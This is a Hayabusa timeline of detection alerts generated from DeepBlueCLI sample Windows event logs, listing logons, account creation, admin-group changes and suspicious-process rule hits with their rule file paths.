| 1 | Timestamp | Computer | EventID | Level | RuleTitle | Details | RulePath | FilePath |
|---|
| 2 | 2013-10-24 01:16:13.843 +09:00 | 37L4247D28-05 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 3 | 2013-10-24 01:16:29.000 +09:00 | 37L4247D28-05 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 4 | 2013-10-24 01:17:44.109 +09:00 | 37L4247D28-05 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 5 | 2013-10-24 01:17:44.109 +09:00 | 37L4247D28-05 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 6 | 2013-10-24 01:18:09.203 +09:00 | 37L4247D28-05 | 2003 | low | USB Device Plugged | | rules/sigma/other/driverframeworks/win_usb_device_plugged.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 7 | 2013-10-24 01:18:33.828 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 8 | 2013-10-24 01:18:33.828 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 9 | 2013-10-24 01:18:50.500 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 10 | 2013-10-24 01:21:30.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 11 | 2013-10-24 01:21:33.630 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 12 | 2013-10-24 01:21:33.630 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 13 | 2013-10-24 01:21:33.630 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 14 | 2013-10-24 01:22:39.911 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 15 | 2013-10-24 01:22:39.911 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 16 | 2013-10-24 01:22:39.911 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 17 | 2013-10-24 01:22:39.973 +09:00 | IE8Win7 | 4720 | medium | Local user account created | User: IEUser : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx |
| 18 | 2013-10-24 01:22:39.973 +09:00 | IE8Win7 | 4720 | medium | Local user account created | User: IEUser : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 19 | 2013-10-24 01:22:40.004 +09:00 | IE8Win7 | 4732 | high | User added to local Administrators group | User: WIN-QALA5Q3KJ43$ : Group: Administrators : LogonID: 0x3e7 | rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml | ../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx |
| 20 | 2013-10-24 01:22:40.004 +09:00 | IE8Win7 | 4732 | high | User added to local Administrators group | User: WIN-QALA5Q3KJ43$ : Group: Administrators : LogonID: 0x3e7 | rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 21 | 2013-10-24 01:22:40.005 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 22 | 2013-10-24 01:22:40.005 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 23 | 2013-10-24 01:22:44.979 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 24 | 2013-10-24 01:22:44.979 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 25 | 2013-10-24 01:22:44.979 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : LogonID: 0x29908 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 26 | 2013-10-24 01:22:44.979 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x298c5 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 27 | 2013-10-24 01:23:39.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 28 | 2013-10-24 01:23:39.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 29 | 2013-10-24 01:24:00.130 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 30 | 2013-10-24 01:24:00.130 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 31 | 2013-10-24 01:24:00.161 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 32 | 2013-10-24 01:24:53.630 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 33 | 2013-10-24 01:27:48.911 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 34 | 2013-10-24 01:27:48.911 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 35 | 2013-10-24 02:27:21.754 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x29908 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 36 | 2013-10-24 02:30:47.140 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 37 | 2013-10-24 02:30:47.140 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 38 | 2013-10-24 02:30:52.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 39 | 2013-10-24 02:30:58.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 40 | 2013-10-24 02:31:10.741 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 41 | 2013-10-24 02:31:10.741 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 42 | 2013-10-24 02:31:10.741 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 43 | 2013-10-24 02:32:53.796 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 44 | 2013-10-24 02:32:53.796 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 45 | 2013-10-24 02:33:10.078 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 46 | 2013-10-24 02:33:18.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 47 | 2013-10-24 02:33:31.593 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 48 | 2013-10-24 02:33:31.593 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 49 | 2013-10-24 02:33:31.593 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 50 | 2013-10-24 02:35:55.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 51 | 2013-10-24 02:35:55.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 52 | 2013-10-24 02:36:53.671 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 53 | 2013-10-24 02:36:53.671 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 54 | 2013-10-24 02:36:53.671 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 55 | 2013-10-24 02:36:53.671 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x57d5b | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 56 | 2013-10-24 02:45:29.131 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 57 | 2013-10-24 02:45:29.131 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 58 | 2013-10-24 02:45:29.131 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 59 | 2013-10-24 02:45:45.037 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x57d8d | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 60 | 2013-10-24 02:49:38.890 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 61 | 2013-10-24 02:49:38.890 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 62 | 2013-10-24 02:50:25.546 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 63 | 2013-10-24 02:50:27.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 64 | 2013-10-24 02:50:33.551 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 65 | 2013-10-24 02:50:33.551 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 66 | 2013-10-24 02:50:33.551 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 67 | 2013-10-24 02:51:17.207 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 68 | 2013-10-24 02:51:17.207 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 69 | 2013-10-24 02:51:17.207 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 70 | 2013-10-24 02:51:17.207 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x27f43 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 71 | 2013-10-24 02:53:48.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 72 | 2013-10-24 02:53:48.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 73 | 2013-10-24 03:48:37.144 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 74 | 2013-10-24 03:48:37.144 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 75 | 2013-10-24 03:49:28.191 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 76 | 2013-10-24 04:02:24.316 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x27f73 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 77 | 2013-10-24 04:04:09.406 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 78 | 2013-10-24 04:04:09.406 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 79 | 2013-10-24 04:04:28.750 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 80 | 2013-10-24 04:04:55.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 81 | 2013-10-24 04:05:04.098 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 82 | 2013-10-24 04:05:04.098 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 83 | 2013-10-24 04:05:04.098 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 84 | 2013-10-24 04:05:59.484 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 85 | 2013-10-24 04:05:59.484 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 86 | 2013-10-24 04:06:18.921 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 87 | 2013-10-24 04:06:25.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 88 | 2013-10-24 04:07:16.729 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 89 | 2013-10-24 04:07:16.729 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 90 | 2013-10-24 04:07:16.729 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 91 | 2013-10-24 04:10:27.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 92 | 2013-10-24 04:10:27.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 93 | 2013-10-24 04:19:23.812 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 94 | 2013-10-24 04:19:23.812 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 95 | 2013-10-24 04:19:46.750 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 96 | 2013-10-24 04:19:52.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 97 | 2013-10-24 04:20:01.879 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 98 | 2013-10-24 04:20:01.879 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 99 | 2013-10-24 04:20:01.879 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 100 | 2013-10-24 04:22:39.125 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 101 | 2013-10-24 04:22:39.125 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 102 | 2013-10-24 04:23:04.093 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 103 | 2013-10-24 04:23:08.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 104 | 2013-10-24 04:23:18.798 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 105 | 2013-10-24 04:23:18.798 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 106 | 2013-10-24 04:23:18.798 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 107 | 2013-10-24 04:25:30.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 108 | 2013-10-24 04:25:30.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 109 | 2013-10-24 04:27:14.204 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 110 | 2013-10-24 04:27:14.204 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 111 | 2013-10-24 04:27:14.204 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 112 | 2013-10-24 04:27:14.204 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x39a20 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
